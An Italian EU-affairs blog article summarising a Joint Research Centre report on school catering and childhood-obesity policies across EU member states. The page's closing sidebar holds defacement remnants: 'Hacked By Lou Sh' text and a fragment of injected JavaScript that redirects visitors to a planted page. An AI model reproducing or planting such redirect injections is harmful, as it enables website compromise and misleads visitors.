EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aggiungere un commento

Ristorazione scolastica: le scelte politichedell’UE




Il Centro comune di ricerca (CCR) pubblica i primi dati riguardo il servizio di ristorazione scolastica in Europa

Dalla relazione, realizzata con l’ausilio del gruppo Ue di alto livello sull’alimentazione e l’attività fisica a sostegno della strategia Ue 2007 per l’alimentazione, il sovrappeso e l’obesità e per il piano d’azione dell’Ue sull’obesità infantile 2014-2020, emerge quanto per i paesi europei sia importante e fondamentale il sostegno della ristorazione scolastica per la salute, lo sviluppo e i risultati scolastici dei bambini.

Lo studio ha analizzato i dati dei 28 Stati membri dell’Ue più Norvegia e Svizzera, evidenziando come le disposizioni variano da paese a paese. Questo perché ogni qual volta si presenta la necessità di stabilire quantità e menù dei cibi da offrire ai più piccoli, le decisioni sono volontarie e non prestabilite. Vi sono però anche dei divieti assoluti comuni a tutti gli Stati membri come l’installazione di distributori automatici e bevande zuccherate.

PNG - 57.3 Kb

La relazione ha analizzato gli orientamenti comuni che gli Stati adottano per i prodotti alimentari che vengono offerti nelle scuole primarie e secondarie. Le politiche si basano sui cibi consentiti o vietati, i livelli nutrizionali, le strutture di ristorazione, i servizi di catering e le restrizioni alla commercializzazione. Questo consente di analizzare in profondità quali siano le normative attuali negli Stati membri, per valutare se le scelte politiche possano combattere in maniera radicale il problema dell’obesità infantile.

Ma quali sono i dati più importanti emersi dalla relazione? Più del 90% delle politiche analizzate racchiudono norme basilari sugli alimenti per consentire menù equilibrati. Abbiamo poi un’analisi della grandezza delle porzioni somministrate ai bambini (76%) e sugli standard nutrizionali dei pasti (65%). Per il settore delle bevande abbiamo forti divieti e restrizioni (65-82%) comuni a quasi tutti gli Stati membri: divieto per le bevande analcoliche zuccherate e un accesso illimitato invece all’acqua potabile.

Gli obiettivi importanti da raggiungere per gli Stati membri sono sicuramente quello di un miglioramento dell’alimentazione per i più piccoli, l’insegnamento della dieta e uno stile di vita sano per prevenire l’obesità infantile. Per esempio gli snack salati o i dolci sono vietati in maniera categorica in molti paesi dell’Ue. Circa il 59% delle politiche suggerisce di misurare i risultati per ciò che riguarda la ristorazione scolastica focalizzandosi sull’offerta dei prodotti alimentari scolastici e la percentuale dei bambini che mangia a scuola. I parametri che spesso vengono presi in considerazione fanno riferimento alle calorie e ai grassi.

PNG - 74.9 Kb

Nelle parole del Commissario responsabile per la salute, Tonio Borg: "Quasi un bambino su tre in Europa è in sovrappeso o obeso, e quindi rischia di sviluppare una serie di malattie che possono essere evitate, tra cui il diabete di tipo 2. Le scuole sono importanti partner, il cui contributo si affianca all’impegno da noi profuso per incoraggiare i bambini a sviluppare abitudini alimentari sane, affinché possano crescere in buone condizioni di salute, avere buoni risultati scolastici e sviluppare appieno le loro capacità. La prima valutazione delle politiche in materia di ristorazione scolastica costituisce pertanto un importante contributo alla lotta da noi intrapresa contro l’obesità".

Máire Geoghegan-Quinn, Commissaria responsabile per la Ricerca, l’innovazione e la scienza, ha aggiunto: "Questa relazione è un buon punto di partenza per i decisori politici, gli educatori e i ricercatori in Europa per analizzare le possibili correlazioni tra politiche in materia di ristorazione scolastica e salute pubblica e per valutare l’efficacia della promozione di abitudini alimentari sane".



Nessun commento
ds Aggiungere un commento

Autori

Vanessa Piacenti
Studentessa del corso di laurea triennale in Scienze della comunicazione, Università si Roma Tor Vergata.

Parole chiave



Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015

© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France